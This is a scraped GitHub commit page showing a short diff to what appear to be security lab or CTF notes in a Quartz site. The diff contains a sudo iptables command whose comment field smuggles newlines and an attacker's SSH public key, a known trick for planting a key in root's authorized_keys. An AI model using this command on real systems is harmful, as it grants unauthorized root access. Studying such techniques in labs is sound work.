generated from jackyzha0/quartz
-
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
4e6680e
commit bfb9090
Showing
1 changed file
with
2 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -392,9 +392,8 @@ ssh [email protected] | |
ssh-keygen -t ed25519 -C "user@ubuntu" | ||
``` | ||
|
||
``` | ||
sudo -u root /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOD4AOKmqCL2DRPY5+2h276o0EHsp0TjpcV47Pa6LvIo kali@kali | ||
user@ubuntu\n' | ||
```bash | ||
sudo -u root /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOD4AOKmqCL2DRPY5+2h276o0EHsp0TjpcV47Pa6LvIo kali@kali user@ubuntu\n' | ||
``` | ||
|
||
```bash | ||
|